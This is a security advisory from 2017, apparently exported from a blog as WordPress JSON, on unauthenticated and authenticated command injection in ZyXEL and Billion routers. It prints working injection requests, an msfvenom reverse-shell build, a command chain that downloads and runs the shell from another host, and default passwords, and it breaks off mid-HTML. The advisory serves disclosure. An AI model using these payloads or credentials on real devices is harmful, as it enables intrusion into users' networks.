{"id":6273,"date":"2017-01-23T14:07:53","date_gmt":"2017-01-23T22:07:53","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-124\/"},"modified":"2017-01-23T14:07:53","modified_gmt":"2017-01-23T22:07:53","slug":"news-124","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-124\/","title":{"rendered":"SSD Advisory &#8211; ZyXEL \/ Billion Multiple Vulnerabilities"},"content":{"rendered":"<div class=\"entry-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes four (4) vulnerabilities and default accounts \/ passwords in ZyXEL \/ Billion customized routers.<\/p>\n<p>TrueOnline is a major Internet Service Provider in Thailand that provides customized versions of routers to its customers, free of charge.<\/p>\n<p>The routers are manufactured by ZyXEL and Billion and run a special Linux distribution called &#8220;tclinux&#8221;. Several models are distributed by TrueOnline; three in particular are widespread:<\/p>\n<ol>\n<li>ZyXEL P660HN-T v1 (distributed up to 2013)<\/li>\n<li>ZyXEL P660HN-T v2<\/li>\n<li>Billion 5200W-T (currently being distributed to new clients)<\/li>\n<\/ol>\n<p>These are customized versions of existing ZyXEL and Billion routers. They are MIPS systems and they all run the BOA web server. The routers are vulnerable to command injection in their web interface, which can be exploited by unauthenticated as well as authenticated attackers. 
Furthermore, the routers include several hardcoded accounts besides the usual administrator account.<\/p>\n<p>The four vulnerabilities found in ZyXEL \/ Billion routers:<\/p>\n<ol>\n<li>Unauthenticated remote command execution vulnerability &#8211; P660HN-T v1 router<\/li>\n<li>Unauthenticated remote command execution vulnerability &#8211; Billion 5200W-T<\/li>\n<li>Authenticated remote command execution vulnerability &#8211; Billion 5200W-T<\/li>\n<li>Unauthenticated remote command execution vulnerability &#8211; P660HN-T v2<\/li>\n<\/ol>\n<p>Default accounts and passwords:<\/p>\n<ol>\n<li>Default accounts &#8211; P660HN-T v1 router<\/li>\n<li>Default accounts &#8211; P660HN-T v2<\/li>\n<li>Default accounts &#8211; Billion 5200W-T router<\/li>\n<\/ol>\n<p><strong>Credit<\/strong><br \/> Pedro Ribeiro (pedrib@gmail.com) has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><span id=\"more-2910\"><\/span><\/p>\n<p><strong>Unauthenticated remote command execution vulnerability &#8211; P660HN-T v1 router<\/strong><br \/> The P660HN-T v1 router has a command injection vulnerability in Maintenance &gt; Logs &gt; System Log &gt; Remote System Log<br \/> Remote host: <em>;command;#<\/em><\/p>\n<p>The vulnerability can be found in the <em>ViewLog.asp<\/em> page, which is accessible without authentication.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb825251915423035\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px 
!important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/cgi-bin\/ViewLog.asp HTTP\/1.1\nremote_submit_Flag=1&amp;remote_syslog_Flag=1&amp;RemoteSyslogSupported=1&amp;LogFlag=0&amp;remote_host=%3bping+-c+3+10.0.99.102%3b%23&amp;remoteSubmit=Save<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0014 seconds] -->  <\/p>\n<p>The command injection is in the <em>remote_host<\/em> parameter:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb82525a124680870\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px 
!important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> remote_host=%3bping+-c+3+10.0.99.102%3b%23<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb82525a124680870-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" 
style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb82525a124680870-1\"><span class=\"crayon-v\">remote_host<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3bping<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">10.0.99.102<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3b<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">23<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0005 seconds] -->  <\/p>\n<p><u>Proof of Concept<\/u><br \/> To perform the attack, the following MSF command line should be used:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb82525d700137108\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" 
title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> msfvenom -p linux\/mipsbe\/shell_reverse_tcp -f elf -o \/tmp\/shell-be.bin lhost=192.168.1.35 lport=4444<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb82525d700137108-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb82525d700137108-1\"><span class=\"crayon-v\">msfvenom<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">linux<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">mipsbe<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">shell_reverse_tcp<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">elf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">shell<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">be<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">bin <\/span><span class=\"crayon-v\">lhost<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">192.168.1.35<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lport<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">4444<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0011 seconds] -->  <\/p>\n<p>Which will serve the <em>\/tmp<\/em> directory through the <em>tftp<\/em> service.<\/p>\n<p>This should be followed by downloading and executing a shell by injecting the following command:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb825260835939099\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div 
class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> cd tmp; tftp -g -r shell.bin 10.13.37.1; chmod +x \/tmp\/shell.bin; \/tmp\/shell.bin<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825260835939099-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb825260835939099-1\"><span class=\"crayon-e\">cd <\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tftp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span 
class=\"crayon-v\">g<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">shell<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">bin<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10.13.37.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">chmod<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">shell<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">shell<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">bin<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0008 seconds] -->  <\/p>\n<p><strong>Default accounts- P660HN-T v1 router<\/strong><\/p>\n<ol>\n<li>username: admin; password: password<\/li>\n<li>username: true; password: true<\/li>\n<\/ol>\n<p><strong>Unauthenticated remote command execution vulnerability &#8211; Billion 5200W-T <\/strong><br \/> There&#8217;s an unauthenticated command injection in the <em>adv_remotelog.asp<\/em> file:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb825262130847715\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" 
data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/cgi-bin\/adv_remotelog.asp HTTP\/1.1\nHost: 192.168.1.1\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 85\n\nRemotelogEnable=1&amp;syslogServerAddr=1.1.1.1%3bping+-c+3+192.168.1.35%3b&amp;serverPort=514<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div 
class=\"crayon-num\" data-line=\"crayon-58867eb825262130847715-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825262130847715-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825262130847715-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825262130847715-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825262130847715-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825262130847715-6\">6<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb825262130847715-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cgi<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">adv_remotelog<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">asp <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825262130847715-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb825262130847715-3\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">www<\/span><span 
class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">urlencoded<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825262130847715-4\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">85<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb825262130847715-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825262130847715-6\"><span class=\"crayon-v\">RemotelogEnable<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">syslogServerAddr<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1.1.1.1<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3bping<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">192.168.1.35<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3b<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">serverPort<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">514<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0016 seconds] -->  <\/p>\n<p>The injection is in the <em>syslogServerAddr<\/em> parameter that can be exploited by entering a valid IP address, followed by <em>&#8220;;&lt;COMMAND&gt;;&#8221;<\/em><\/p>\n<p><u>Proof of Concept<\/u><br \/> Same as the previously mentioned unauthenticated remote command execution vulnerability &#8211; P660HN-T v1, the only difference is the target device.<\/p>\n<p><strong>Authenticated 
command execution vulnerability &#8211; Billion 5200W-T<\/strong><br \/> The Billion 5200W-T has an authenticated command injection in its <em>tools_time.asp<\/em> interface, in the <em>uiViewSNTPServer<\/em> parameter:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb825265629131071\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; 
-o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/cgi-bin\/tools_time.asp HTTP\/1.1\nHost: 127.0.0.1:10080\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\nCookie: SESSIONID=7c082c75\nContent-Length: ...\n\nSaveTime=1&amp;uiCurrentTime2=&amp;uiCurrentTime1=&amp;ToolsTimeSetFlag=0&amp;uiRadioValue=0&amp;uiClearPCSyncFlag=0&amp;uiwPCdateMonth=0\n&amp;uiwPCdateDay=&amp;uiwPCdateYear=&amp;uiwPCdateHour=&amp;uiwPCdateMinute=&amp;uiwPCdateSec=&amp;uiCurTime=N%2FA+%28NTP+server+is+connecting%29\n&amp;uiTimezoneType=0&amp;uiViewSyncWith=0&amp;uiPCdateMonth=1&amp;uiPCdateDay=&amp;uiPCdateYear=&amp;uiPCdateHour=&amp;uiPCdateMinute=\n&amp;uiPCdateSec=&amp;uiViewdateToolsTZ=GMT%2B07%3A00&amp;uiViewdateDS=Disable&amp;uiViewSNTPServer=&quot;%3b+ping+-c+20+127.0.0.1+%26%23\n&amp;ntp2ServerFlag=N%2FA&amp;ntp3ServerFlag=N%2FA<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825265629131071-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825265629131071-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825265629131071-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825265629131071-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825265629131071-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825265629131071-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825265629131071-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb825265629131071-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825265629131071-9\">9<\/div>\n<div class=\"crayon-num 
crayon-striped-num\" data-line=\"crayon-58867eb825265629131071-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825265629131071-11\">11<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb825265629131071-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cgi<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tools_time<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">asp <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825265629131071-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">127.0.0.1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10080<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb825265629131071-3\"><span class=\"crayon-v\">Authorization<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Basic <\/span><span class=\"crayon-v\">YWRtaW46cGFzc3dvcmQ<\/span><span class=\"crayon-o\">=<\/span><\/div>\n<div 